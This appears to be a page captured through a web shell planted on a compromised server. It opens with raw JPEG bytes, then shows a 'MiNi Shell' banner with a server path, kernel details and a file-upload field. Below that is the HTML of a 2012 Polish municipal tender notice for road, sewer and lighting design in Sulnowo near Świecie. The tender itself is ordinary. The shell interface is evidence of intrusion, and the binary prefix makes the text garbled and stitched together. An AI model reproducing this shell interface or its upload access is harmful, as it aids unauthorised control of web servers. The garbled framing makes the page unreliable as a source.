JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121210/499916-N-2012.html

<p class="kh_header"><b>Świecie: Opracowanie dokumentacji projektowej dla zadania pn. Budowa infrastruktury technicznej na osiedlu domów jednorodzinnych w Sulnowie</b><br>
<b>Numer ogłoszenia: 499916 - 2012; data zamieszczenia: 10.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świecie , ul. Wojska Polskiego 124, 86-100 Świecie, woj. kujawsko-pomorskie, tel. 52 333 23 10, faks 52 333 23 51.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swiecie.eu</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej dla zadania pn. Budowa infrastruktury technicznej na osiedlu domów jednorodzinnych w Sulnowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest opracowanie dokumentacji projektowej, składającej się z projektów budowlanych i wykonawczych branży drogowej, kanalizacji sanitarnej i deszczowej oraz elektroenergetycznej wraz z uzyskaniem zgodnie z obowiązującymi przepisami wszelkich opinii, uzgodnień i decyzji administracyjnych pozwalających na realizację inwestycji drogowej.
I etap - polegający na budowie dróg gminnych oznakowanych w miejscowym planie zagospodarowania przestrzennego dla wsi Sulnowo jako ulica Chabrowa na odcinku od drogi wojewódzkiej do końca działki 6/32 oznaczona jako E1KDL (istniejąca ulica lokalna) oraz drogi dojazdowe D2KDD,
II etap - polegający na budowie dróg gminnych oznakowanych w miejscowym planie zagospodarowania przestrzennego dla wsi Sulnowo jako drogi wewnętrzne D11KDW,
III etap - polegający na budowie dróg gminnych oznakowanych w miejscowym planie zagospodarowania przestrzennego dla wsi Sulnowo jako drogi wewnętrzne D5KDW. Planowana budowa dróg gminnych zawarta jest w obszarze leżącym pomiędzy drogą wojewódzką Nr 239 Błądzim - Lniano - Drzycim - Świecie, a drogą powiatową Dziki - Jeżewo oraz ulicą Chabrową.
IV etap - polegający na budowie dróg gminnych oznakowanych w miejscowym planie zagospodarowania przestrzennego dla wsi Sulnowo jako droga dojazdowa B3KDD do ul. Grabowej i drogi wewnętrzne B17KDW, B6KDW,
V etap - polegający na budowie dróg gminnych zlokalizowanych pomiędzy drogą wojewódzką Nr 239 Błądzim - Lniano - Drzycim - Świecie a drogą gminną Nr 031314C.

2.	Zakres zamówienia obejmuje:
2.1.	Sporządzenie dokumentacji projektowej zamówienia z podziałem na pięć zadań (I, II, III, IV i V etap) wraz z uzyskaniem decyzji administracyjnej pozwalającej na realizację inwestycji drogowej dla każdego zadania osobno w tym:
2.1.1.	Wykonanie mapy sytuacyjno - wysokościowej do celów projektowych w skali 1:500 i pozyskanie mapy sytuacyjno - wysokościowej do celów opiniodawczych, należy zwrócić szczególną uwagę na niedokładności wykonywanych kopii map do celów projektowych by miały czytelny wyrys granic i numery działek.
2.1.2.	Uzyskanie wypisów z rejestru gruntów wraz z mapą ewidencyjną i sporządzenie wykazu działek zajmowanych przez inwestycję.
2.1.3.	Sporządzenie wykazu działek i właścicieli gruntów dla terenów pod projektowane pasy drogowe, chodniki z adresami zamieszkania, numerami działek i powierzchniami terenu do wykupu. Uwaga: projekty podziału nieruchomości (działek) pod inwestycję dokona Zamawiający na podstawie wcześniej przygotowanych przez Wykonawcę dokumentów. Wykonawca na podstawie otrzymanych projektów podziału nieruchomości uaktualni mapę z lokalizacją inwestycji.
2.1.4.	Wykonanie niezbędnych badań geologicznych zgodnie z obowiązującymi przepisami i wytycznymi w zakresie niezbędnym do prawidłowego opracowania dokumentacji.
2.1.5.	Przygotowanie dokumentacji prawnej do uzyskania decyzji zezwolenia na realizację inwestycji drogowej: zgody wszystkich właścicieli nieruchomości na których lokalizowane będą urządzenia uzbrojenia podziemnego poza liniami rozgraniczającymi pasa drogowego, uzyskanie decyzji o środowiskowych  uwarunkowaniach, zgody na realizację przedsięwzięcia wraz z raportem o oddziaływaniu na środowisko, gdy będzie on konieczny, decyzji pozwolenia wodno - prawnego oraz innych wymaganych przepisami opinii i decyzji koniecznych do złożenia przez Zamawiającego wniosku o wydanie decyzji zezwolenia na realizację inwestycji drogowej w tym przygotowanie wniosku do podpisu przez Zamawiającego z kompletem wymaganych dokumentów.
2.1.6.	Opracowanie projektów: budowlanego i wykonawczego na niżej wskazany zakres:
a)	rozbudowa istniejącej ulicy Chabrowej na odcinku od drogi wojewódzkiej do końca działki 6/32 oznaczona jako E1KDL, istniejąca ulica lokalna o szerokości 7 m w liniach rozgraniczających - 20 m oznaczonych w miejscowym planie zagospodarowania dla wsi Sulnowa: 
-	branża drogowa: rozbudowa istniejącej jezdni o nawierzchni żużlowej w tym poszerzenie jezdni do 7 m oraz chodnikami po obu stronach ulicy,
-	branża sanitarna: projekt kanalizacji deszczowej/odwodnienie drogi w miejscach technicznie lub ekonomicznie nieuzasadnionych inne rozwiązania oraz rozbudowa istniejącej kanalizacji sanitarnej dn 200 mm z przyłączami zlokalizowanymi w odległości do 1 m za granicą działki zakończone studzienką,
-	branża elektroenergetyczna: budowa oświetlenia ulicznego,
b)	budowa trzech dróg publicznych dojazdowych o długości ok. 1410 m o szerokości w liniach rozgraniczających 12 m i oznaczonych jako D2KDD w miejscowym planie zagospodarowania przestrzennego:
-	branża drogowa: jezdnia szer. 6 m, chodnik po 1,5 m,
-	branża elektroenergetyczna: budowa oświetlenia ulicznego,
-	branża sanitarna: kanalizacja sanitarna z przyłączami zlokalizowanymi w odległości do 1 m za granicą działki zakończone studzienką, deszczowa w miejscach technicznie lub ekonomicznie nieuzasadnionych inne rozwiązania i sieć wodociągowa wraz z przyłączami,
c)	budowa dwóch dróg publicznych wewnętrznych o długości ok. 663 m, o szerokości w liniach rozgraniczających 12 m i oznaczonych jako D11KDW w miejscowym planie zagospodarowania przestrzennego
-	branża drogowa: jezdnia szerokości 6 m, chodniki po 1,5 m,
-	branża elektroenergetyczna: budowa oświetlenia ulicznego,
-	branża sanitarna: kanalizacja sanitarna ze zlokalizowanymi przyłączami w odległości do 1 m za granicą działki zakończone studzienką, deszczowa w miejscach technicznie lub ekonomicznie nieuzasadnionych inne rozwiązania i sieć wodociągowa wraz z przyłączami
d)	budowa dwóch dróg publicznych wewnętrznych o długości ok. 667 m, o szerokości w liniach rozgraniczających 12 m i oznaczonych jako D5KDW w miejscowym planie zagospodarowania przestrzennego
-	branża drogowa: jezdnia szerokości 6 m, chodniki po 1,5 m,
-	branża elektroenergetyczna: budowa oświetlenia ulicznego,
-	branża sanitarna: kanalizacja sanitarna ze zlokalizowanymi przyłączami w odległości do 1 m za granicą działki zakończone studzienką, deszczowa w miejscach technicznie lub ekonomicznie nieuzasadnionych inne rozwiązania i sieć wodociągowa wraz z przyłączami
e)	budowa części drogi wewnętrznej o długości ok. 160 m, o szerokości w liniach rozgraniczających 12 m i znajdująca się poza miejscowym planem zagospodarowania przestrzennego
-	branża drogowa: jezdnia szerokości 6 m, chodniki 1,5 m,
-	branża elektroenergetyczna: budowa oświetlenia ulicznego,
-	branża sanitarna: kanalizacja sanitarna ze zlokalizowanymi przyłączami w odległości do 1 m za granicą działki zakończone studzienką, deszczowa w miejscach technicznie lub ekonomicznie nieuzasadnionych inne rozwiązania i sieć wodociągowa wraz z przyłączami
f)	budowa drogi publicznej dojazdowej o długości ok. 375 m, o szerokości w liniach rozgraniczających 12 m i oznaczonych jako B3KDD w miejscowym planie zagospodarowania przestrzennego
-	branża drogowa: jezdnia szerokości 6 m, chodniki po 1,5 m,
-	branża elektroenergetyczna: budowa oświetlenia ulicznego,
-	branża sanitarna: kanalizacja sanitarna ze zlokalizowanymi przyłączami w odległości do 1 m za granicą działki zakończone studzienką, deszczowa z włączeniem do istniejącej kanalizacji i sieć wodociągowa z przyłączami i włączeniem do istniejącej sieci wodociągowej w ulicy Grabowej
g)	budowa drogi publicznej wewnętrznej o długości ok. 150 m, o szerokości w liniach rozgraniczających 12 m i oznaczonych jako B6KDW w miejscowym planie zagospodarowania przestrzennego
-	branża drogowa: jezdnia szerokości 6 m, chodnik 1,5 m,
-	branża elektroenergetyczna: budowa oświetlenia ulicznego,
-	branża sanitarna: kanalizacja sanitarna ze zlokalizowanymi przyłączami w odległości do 1 m za granicą działki zakończone studzienką, deszczowa z włączeniem do istniejącej kanalizacji deszczowej i sieć wodociągowa z przyłączami i włączeniem do istniejącej sieci wodociągowej w ulicy Grabowej
h)	budowa drogi publicznej wewnętrznej o długości ok. 90 m, o szerokości w liniach rozgraniczających 10 m i oznaczonych jako B17KDW w miejscowym planie zagospodarowania przestrzennego
-	branża drogowa: jezdnia szerokości 6 m, chodnik 1,5 m,
-	branża elektroenergetyczna: budowa oświetlenia ulicznego,
-	branża sanitarna: kanalizacja sanitarna ze zlokalizowanymi przyłączami w odległości do 1 m za granicą działki zakończone studzienką, deszczowa i sieć wodociągowa z przyłączami
i)	ulica Lipowa
-	branża sanitarna: kolektor grawitacyjny bez przyłączy
j)	budowa drogi publicznej dojazdowej o długości ok. 800 m, o szerokości w liniach rozgraniczających 12 m i oznaczonych jako G1KDD w miejscowym planie zagospodarowania przestrzennego
-	branża drogowa: jezdnia szerokości 6 m, chodnik 1,5 m,
-	branża elektroenergetyczna: budowa oświetlenia ulicznego,
-	branża sanitarna: kanalizacja sanitarna ze zlokalizowanymi przyłączami w odległości do 1 m za granicą działki zakończone studzienką z włączeniem do istniejącej kanalizacji sanitarnej dn. 200 mm oddalonej ok. 160 m od projektowanego terenu lub do istniejącej kanalizacji na działce, deszczowa a w miejscach technicznie lub ekonomicznie nieuzasadnionych inne rozwiązania i sieć wodociągowa z przyłączami
k)	budowa drogi publicznej wewnętrznej o długości ok. 540 m, o szerokości w liniach rozgraniczających 12 m i oznaczonych jako G3KDW w miejscowym planie zagospodarowania przestrzennego
-	branża drogowa: jezdnia szerokości 6 m, chodniki po 1,5 m,
-	branża elektroenergetyczna: budowa oświetlenia ulicznego,
-	branża sanitarna: kanalizacja sanitarna ze zlokalizowanymi przyłączami w odległości do 1 m za granicą działki zakończone studzienką, deszczowa w miejscach technicznie lub ekonomicznie nieuzasadnionych inne rozwiązania i sieć wodociągowa z przyłączami
l)	budowa drogi publicznej wewnętrznej o długości ok. 100 m, o szerokości w liniach rozgraniczających 12 m i oznaczonych jako G9KDW w miejscowym planie zagospodarowania przestrzennego
-	branża drogowa: jezdnia szerokości 6 m, chodniki po 1,5 m,
-	branża elektroenergetyczna: budowa oświetlenia ulicznego,
-	branża sanitarna: kanalizacja sanitarna ze zlokalizowanymi przyłączami w odległości do 1 m za granicą działki zakończone studzienką, deszczowa a w miejscach technicznie lub ekonomicznie nieuzasadnionych inne rozwiązania i sieć wodociągowa z przyłączami
m)	budowa drogi publicznej dojazdowej o długości ok. 380 m, o szerokości w liniach rozgraniczających 12 m i oznaczonych jako F5KDD w miejscowym planie zagospodarowania przestrzennego
-	branża drogowa: jezdnia szerokości 6 m, chodniki po 1,5 m,
-	branża elektroenergetyczna: budowa oświetlenia ulicznego,
-	branża sanitarna: kanalizacja sanitarna ze zlokalizowanymi przyłączami w odległości do 1 m za granicą działki zakończone studzienką z włączeniem do istniejącej kanalizacji sanitarnej dn. 200 mm i projektowanej kanalizacji sanitarnej (przez BIPROKABEL Bydgoszcz), deszczowa a w miejscach technicznie lub ekonomicznie nieuzasadnionych inne rozwiązania i sieć wodociągowa z przyłączami
n)	budowa drogi publicznej wewnętrznej o długości ok. 60 m, o szerokości w liniach rozgraniczających 10 m i oznaczonych jako F10KDW w miejscowym planie zagospodarowania przestrzennego
-	branża drogowa: jezdnia szerokości 6 m, chodniki po 1,5 m,
-	branża elektroenergetyczna: budowa oświetlenia ulicznego,
-	branża sanitarna: kanalizacja deszczowa a w miejscach technicznie lub ekonomicznie nieuzasadnionych inne rozwiązania i sieć wodociągowa z przyłączami
o)	projekty branżowe zabezpieczenia lub niezbędnego przełożenia istniejącego uzbrojenia podziemnego i naziemnego z ewentualną przebudową wynikające z kolizji i uzyskanych warunków technicznych od gestorów urządzeń
p)	wykonanie operatu wodno prawnego na odprowadzenie wód opadowych z odwodnienia ulicznego, jeżeli będzie wymagany odrębnymi przepisami
q)	wykonanie projektu organizacji ruchu docelowego i projektu czasowej organizacji ruchu (na czas wykonywanych robót).
2.1.7.	Sporządzenie przedmiarów robót i kosztorysów inwestorskich w rozbiciu na branże: projekt branży drogowej, branży sanitarnej - sieci wodociągowej, kanalizacji deszczowej i sanitarnej, elektroenergetycznej w tym projekty branżowe niezbędnych przekładek lub zabezpieczenia istniejącego uzbrojenia podziemnego i naziemnego. Przedmiary dotyczące robót drogowych należy sporządzić z podziałem oddzielnie na jezdnię i na pozostałe tj. chodniki, wjazdy, zieleń dla każdej z ulic.
2.1.8.	Sporządzenie specyfikacji technicznych wykonania i odbioru robót w zakresie każdej branży, które będą zawierały zbiory wymagań umożliwiające określenie standardu i jakości wykonania robót w zakresie ich wykonania.
2.1.9.	Wykonawca zobowiązany będzie do: dokonania aktualizacji - w razie potrzeby, kosztorysów inwestorskich w okresie od 1 roku do 2-ch lat od ich wykonania, udzielania odpowiedzi i wyjaśnień dotyczących prac objętych dokumentacją projektową w terminie nie dłuższym niż 3 dni od daty powzięcia informacji o zaistniałym problemie oraz opracowania rozwiązań alternatywnych w terminie wyznaczonym przez Zamawiającego. Uwaga: Zamawiający zastrzega sobie prawo uzgadniania projektu w trakcie opracowywania projektu tj. co najmniej dwukrotne spotkanie Wykonawcy (Projektanta) z przedstawicielami Zamawiającego celem konsultacji rozwiązań projektowych. Zamawiający upoważni Wykonawcę do występowania w jego imieniu w sprawach dotyczących uzyskania warunków technicznych od gestorów sieci i urządzeń.

3.	Przy opracowaniu poszczególnych części projektu należy uwzględnić następujące zalecenia:
a)	projekty wykonawcze powinny posiadać wszystkie niezbędne szczegółowe rozwiązania wynikające z przedmiotu zamówienia i niezbędne do zrealizowania zadań,
b)	projekty powinny posiadać wykaz opracowań oraz pisemne oświadczenie Jednostki Projektującej, że wykonane zostały zgodnie z umową, obowiązującymi normami i zostały wykonane w stanie kompletnym z punktu widzenia celu, któremu mają służyć,
c)	sieci uzbrojenia należy pokolorować w projektach budowlanych czytelną techniką,
d)	formularz przedmiaru robót do wyceny należy sporządzić w układzie tabelarycznym wg przedmiaru podstawowego wg KNR z podaniem SST przy każdej pozycji, w tabeli należy ująć: 1.LP, 2. Pozycja SST, 3. Rodzaj robót, 4. Jednostka, 5. Ilość jednostek, 6. Cena jednostkowa, 7. Wartość netto,
e)	specyfikacja techniczna wykonania i odbioru robót budowlanych powinna być sporządzona wg wytycznych rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2004 r., Nr 202, poz. 2072), w szczególności wymagania dotyczące właściwości materiałów, wymagania dotyczące sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót oraz określające zakresy prac, które powinny być ujęte w cenach poszczególnych pozycji przedmiaru,
f)	kosztorysy inwestorskie sporządzone wg wytycznych rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. - Metody i podstawy sporządzania kosztorysu inwestorskiego (Dz. U. z 2004 r., Nr 130, poz. 1389),
g)	projekt budowlany winien uzyskać wymagane przepisami szczegółowymi opinie i uzgodnienia i być sporządzony zgodnie z przepisami Prawa Budowlanego i Ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz. U. z 2008 r., Nr 193, poz. 1194 z póź. zm.)
h)	Wykonawca dodatkowo przedłoży Zamawiającemu projekty i specyfikacje techniczne w wersji elektronicznej, a kosztorysy inwestorskie i przedmiary robót w programie kosztorysowym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy zrealizowali należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie minimum dwie usługi polegające na opracowaniu dokumentacji projektowej budowy, rozbudowy lub przebudowy drogi o kategorii co najmniej drogi gminnej (ustawa z dnia 21 marca 1985 r. o drogach publicznych określa kategorię dróg, Dz. U. z 2007 r., Nr 19, poz. 115 ze zm.). Jeżeli Wykonawca polega na zasobach innego podmiotu - wiedzy i doświadczeniu (niezależnie od charakteru prawnego łączących go z nimi stosunków):
a) podmiot ten musi uczestniczyć w wykonywaniu zamówienia, ponadto z dokumentu musi wynikać, ze usługi zrealizowane przez ten podmiot zostały wykonane należycie,
b) zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami - w szczególności przedstawia w tym celu w oryginale pisemne zobowiązanie tego (tych) podmiotu (podmiotów) do oddania mu do dyspozycji wiedzy i doświadczenia jak wskazano wyżej na okres korzystania z nich przy wykonywaniu zamówienia.
Na potwierdzenie spełnienia warunku Wykonawca złoży Wykaz usług - zał. do SIWZ wraz z załączeniem dokumentu potwierdzającego, że usługi zostały wykonane należycie np. referencje, protokóły odbioru, opinia zamawiającego na rzecz którego zamówienie zostało zrealizowane. Ocena spełnienia warunku na podstawie analizy treści oświadczenia i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wykazania, że Wykonawca dysponuje lub będzie dysponował osobami z uprawnieniami budowlanymi do projektowania bez ograniczeń w następujących specjalnościach:
a)	drogowej oraz posiadającą doświadczenie zawodowe w projektowaniu - wykonał min. 1 dokumentację projektową budowy, rozbudowy lub przebudowy drogi o kategorii co najmniej drogi gminnej (ustawa z dnia 21 marca 1985 r. o drogach publicznych określa kategorię dróg - Dz. U. z 2007 r., Nr 115 ze zm.). Osoba ta będzie pełniła funkcję projektanta układu drogowego
b)	instalacyjnej w zakresie sieci kanalizacyjnych i wodociągowej oraz posiadającą doświadczenie zawodowe w projektowaniu - wykonał min. 1 dokumentację projektową budowy lub przebudowy sieci kanalizacyjnej i wodociągowej. Osoba ta będzie pełniła funkcję projektanta sieci kanalizacyjnych i wodociągowej
c)	instalacyjnej w zakresie sieci, urządzeń elektrycznych i elektroenergetycznych oraz posiadającą doświadczenie zawodowe w projektowaniu - wykonał min. 1 dokumentację projektową budowy lub przebudowy sieci elektrycznych. Osoba ta będzie pełniła funkcję projektanta sieci elektrycznych
Jeżeli Wykonawca (niezależnie od charakteru prawnego łączących stosunków z innymi podmiotami) polega na zasobach innych podmiotów - osobach zdolnych do wykonania zamówienia, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami. W szczególności przedstawia w tym celu w oryginale pisemne zobowiązanie tego (tych) podmiotu (ów) do oddania mu  do dyspozycji osób z uprawnieniami i doświadczeniem jak wskazano wyżej, na okres korzystania z tych osób przy wykonywaniu zamówienia. Dopuszcza się łączenie funkcji projektanta w kilku specjalnościach przez jedną osobę pod warunkiem, że osoba ta będzie posiadała wymagane uprawnienia i doświadczenie.
Na potwierdzenie spełnienia warunku Wykonawca złoży Wykaz osób - zał. do SIWZ, oświadczenie o uprawnieniach - zał. do SIWZ. Ocena spełnienia warunku na podstawie analizy treści oświadczenia i dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

